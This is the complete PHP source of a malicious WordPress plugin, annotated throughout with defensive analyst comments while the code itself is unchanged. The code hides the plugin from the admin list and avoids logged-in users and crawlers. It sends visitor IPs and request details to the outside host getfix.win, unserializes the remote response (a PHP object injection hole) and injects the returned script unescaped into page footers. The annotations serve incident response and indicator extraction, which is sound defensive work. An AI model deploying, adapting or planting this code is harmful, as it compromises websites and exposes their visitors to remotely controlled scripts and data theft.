



// Analyst note: exits unless ABSPATH is defined, i.e. unless the file was
// loaded by WordPress. Requesting the file directly over HTTP therefore
// executes nothing past this point and returns no output.
if (!defined('ABSPATH')) {
    exit;
}

// Analyst note (self-concealment): this callback removes the file's own entry
// from the array passed through the 'all_plugins' filter, which WordPress
// applies to the plugin list shown on the admin Plugins screen. The plugin
// keeps running but is not listed there, so the admin list is not a reliable
// inventory; compare it with the plugin directory contents on disk instead.
add_filter('all_plugins', function ($plugins) {
    // Key used by WordPress for this plugin: its path relative to the plugins directory.
    $current_plugin_file = plugin_basename(__FILE__);
    if (isset($plugins[$current_plugin_file])) {
        unset($plugins[$current_plugin_file]);
    }
    return $plugins;
});

// Analyst note: the class_exists() guard keeps a second copy of this code
// (e.g. the same file dropped in another location) from redeclaring the class.
if (!class_exists('HTTP2_FORWARDED_FOR')) {

    /**
     * Analyst summary (defensive annotation, code unchanged).
     *
     * Despite the header-like class name, this class does nothing with HTTP/2
     * or forwarding. On front-end page views by visitors who are not logged in
     * and whose user agent is not on its crawler list, it:
     *   1. sends visitor and site details to the remote host configured in
     *      $wordpress_updates_url (maybe_fetch_js()),
     *   2. unserializes the response and keeps element 0 if it contains "<script",
     *   3. echoes that markup unescaped in the page footer (check_http_cache()).
     *
     * Indicators visible in this file: the remote host in $wordpress_updates_url,
     * the cookie name in $cookie_name, the class name, and the $api_key string.
     */
    class HTTP2_FORWARDED_FOR {

        // Remote endpoint queried on visitor page views. The property name suggests
        // WordPress updates, but the host is not a WordPress.org address.
        private $wordpress_updates_url = "https://getfix.win/?api=";
        // Sent as field 0 of every request; presumably identifies the operator or
        // campaign to the remote side (not confirmable from this file).
        private $api_key = '8bvrCi5smQiHrQox';
        // Sent as field 1 of every request; meaning is defined by the remote side.
        private $group_id    = 'repo';
        // Per-browser counter cookie; a useful client-side indicator.
        private $cookie_name = 'http2_show_count';
        // Counter cookie lifetime in seconds (2592000 s = 30 days).
        private $cookie_lifetime = 2592000;
        // Holds the markup returned by the remote host until the footer is printed.
        // Not a cache in the usual sense; it lives only for the current request.
        private $http_cache     = '';
        // Set once the markup has been echoed, so it is printed at most once per request.
        private $printed     = false;
        // Set once the template_redirect callback has been registered.
        private $armed       = false;
        // Number of successful injections per browser before the counter stops further fetches.
        private $max_views   = 3;
        // Days the counter cookie is extended for once $max_views is reached.
        private $block_days  = 14;

        /**
         * Registers the two entry points: maybe_arm_fetch() on 'init' at
         * priority 0, and check_http_cache() on 'wp_footer'.
         */
        public function __construct() {
            add_action('wp_footer', [$this, 'check_http_cache']);
            add_action('init',      [$this, 'maybe_arm_fetch'], 0);
        }

        /**
         * Request-type gate. Returns true only for front-end GET/HEAD requests
         * that look like ordinary HTML page loads.
         *
         * Excluded: admin screens, AJAX, cron, REST requests, and URIs for
         * /wp-json, /wp-sitemap*.xml, robots.txt, any .xml and /wp-admin.
         * Practical effect for responders: the behaviour does not show up in the
         * dashboard, in API calls or in sitemap/robots fetches.
         */
        private function should_run_early(): bool {
            if (is_admin()) return false;
            if (function_exists('wp_doing_ajax') && wp_doing_ajax()) return false;
            if (function_exists('wp_doing_cron') && wp_doing_cron()) return false;
            if (defined('REST_REQUEST') && REST_REQUEST) return false;

            $method = $_SERVER['REQUEST_METHOD'] ?? 'GET';
            if ($method !== 'GET' && $method !== 'HEAD') return false;

            // An absent or empty Accept header passes; a non-empty one must mention text/html.
            $accept = $_SERVER['HTTP_ACCEPT'] ?? '';
            if ($accept && stripos($accept, 'text/html') === false) return false;

            $uri = $_SERVER['REQUEST_URI'] ?? '';
            if ($uri) {
                if (preg_match('~^/wp-json(/|$)~i', $uri)) return false;
                if (preg_match('~^/wp-sitemap.*\.xml$~i', $uri)) return false;
                if (preg_match('~robots\.txt($|\?)~i', $uri)) return false;
                if (preg_match('~\.xml($|\?)~i', $uri)) return false;
                if (preg_match('~^/wp-admin(/|$)~i', $uri)) return false;
            }

            return true;
        }

        /**
         * Audience filter. Truthy when the request comes from a logged-in user
         * or from a user agent on the crawler list below; callers then skip the
         * fetch and the injection.
         *
         * Consequence for investigation: site owners browsing while logged in,
         * and scanners that identify themselves with one of these user agents,
         * are never served the injected markup. The last return path yields
         * preg_match()'s int result (1/0) rather than a bool.
         */
        private function is_bot_or_admin() {
            if (function_exists('is_user_logged_in') && is_user_logged_in()) {
                return true;
            }
            // Second check by cookie name prefix only; the cookie value is not validated.
            foreach ($_COOKIE as $key => $value) {
                if (strpos($key, 'wordpress_logged_in_') === 0) {
                    return true;
                }
            }
            $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
            $pattern = '#(bot|crawl|slurp|spider|baidu|ahrefs|mj12bot|semrush|facebookexternalhit|facebot|ia_archiver|yandex)#i';
            return preg_match($pattern, $ua);
        }

        /**
         * URI filter. Returns false when the request URI (lower-cased, with
         * surrounding whitespace, NUL bytes and slashes trimmed) contains any of
         * the listed core paths, feed/API markers or static-file extensions.
         * The pattern is unanchored, so a match anywhere in the URI excludes it.
         */
        private function is_valid_uri() {
            $uri = strtolower(trim($_SERVER["REQUEST_URI"] ?? '', "\t\n\r\0/"));
            $pattern = '#wp-login\.php|wp-cron\.php|xmlrpc\.php|wp-admin|wp-includes|wp-content|\?feed=|/feed|wp-json|\?wc-ajax|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.jpe?g|\.tiff|\.mp[34g]|\.wmv|\.zip|\.rar|\.exe|\.pdf|\.txt|sitemap.*\.xml|robots\.txt#i';
            return !preg_match($pattern, $uri);
        }

        /**
         * 'init' callback. If the request passes all three filters, registers a
         * 'template_redirect' callback (priority 0) that performs the remote
         * fetch. $armed makes the registration happen at most once per request.
         */
        public function maybe_arm_fetch() {
            if ($this->armed) return;

            if ($this->is_bot_or_admin()) return;
            if (!$this->should_run_early()) return;
            if (!$this->is_valid_uri()) return;

            $this->armed = true;

            // The request-type gate is evaluated again when the callback fires.
            add_action('template_redirect', function () {
                if (!$this->should_run_early()) return;
                $this->maybe_fetch_js();
            }, 0);
        }

        /**
         * Contacts the remote host and stores any returned "<script" markup for
         * the footer hook.
         *
         * Security-relevant behaviour visible here:
         *  - Visitor data (IP, referer, user agent, language, host, URI, country
         *    header) leaves the site in the query string of an outbound GET.
         *  - The request is made during page handling with a 5-second timeout.
         *  - The response is passed to unserialize() and then echoed later
         *    without escaping.
         *  - Throttling is by a browser cookie only; nothing is stored
         *    server-side in this file.
         */
        private function maybe_fetch_js() {
            if ($this->is_bot_or_admin()) return;
            if (!$this->is_valid_uri()) return;

            // Counter is read from a client-supplied cookie; a browser without the cookie starts at 0.
            $show_count = isset($_COOKIE[$this->cookie_name]) ? intval($_COOKIE[$this->cookie_name]) : 0;

            // Cap reached: no fetch, and the cookie expiry is pushed out by $block_days
            // again on every such page view.
            if ($show_count >= $this->max_views) {
                setcookie($this->cookie_name, $show_count, time() + ($this->block_days * 24 * 3600), "/");
                return;
            }

            // First X-Forwarded-For entry is preferred over REMOTE_ADDR; that header is
            // client-controlled unless a trusted proxy sets it.
            $ip = $_SERVER['REMOTE_ADDR'] ?? '';
            if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $ip_parts = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
                $ip = trim($ip_parts[0]);
            }

            // Positional record sent to the remote host. Positions 5, 7, 11 and 12 are
            // sent empty; their meaning is defined by the remote side and not visible here.
            $request_data = [
                $this->api_key,
                $this->group_id,
                $ip,
                $_SERVER['HTTP_REFERER']     ?? '',
                $_SERVER['HTTP_USER_AGENT']  ?? '',
                '',
                substr($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '', 0, 2),
                '',
                $_SERVER['HTTP_HOST']   ?? '',
                $_SERVER['REQUEST_URI'] ?? '',
                strtolower($_SERVER['HTTP_CF_IPCOUNTRY'] ?? ''),
                [],
                ''
            ];

            // Serialized, base64-encoded and URL-encoded into the "api" query parameter:
            // outbound requests to this host carry one long opaque parameter value.
            $encoded = base64_encode(serialize($request_data));
            $updates_query_url = $this->wordpress_updates_url . urlencode($encoded);

            $response = wp_remote_get($updates_query_url, ['timeout' => 5]);
            if (!is_wp_error($response)) {
                $body = trim(wp_remote_retrieve_body($response));
                // unserialize() on a body fully controlled by the remote host, with errors
                // suppressed and no allowed_classes restriction: in addition to delivering
                // markup, the response can instantiate classes loaded on the site
                // (PHP object injection).
                $unserialized = @unserialize($body);

                // Only element 0 is used, and only if it contains "<script"; what the
                // script does is decided remotely per request and is not visible in this file.
                if (is_array($unserialized) && !empty($unserialized[0]) && stripos($unserialized[0], '<script') !== false) {
                    $this->http_cache = $unserialized[0];

                    // Count this delivery and keep the counter for $cookie_lifetime seconds.
                    $show_count++;
                    setcookie($this->cookie_name, $show_count, time() + $this->cookie_lifetime, "/");
                }
            }
        }

        /**
         * 'wp_footer' callback. Echoes the markup stored by maybe_fetch_js()
         * verbatim, with no escaping, once per request. The name suggests a
         * cache check; the function's only effect is this output.
         */
        public function check_http_cache() {
            if ($this->printed) return;

            if (!$this->should_run_early()) return;

            if (!empty($this->http_cache) && stripos($this->http_cache, '<script') !== false) {
                echo "\n" . $this->http_cache . "\n";
                $this->printed = true;
            }
        }
    }

    // Instantiated as soon as the file is loaded; the constructor registers the hooks.
    new HTTP2_FORWARDED_FOR();
}


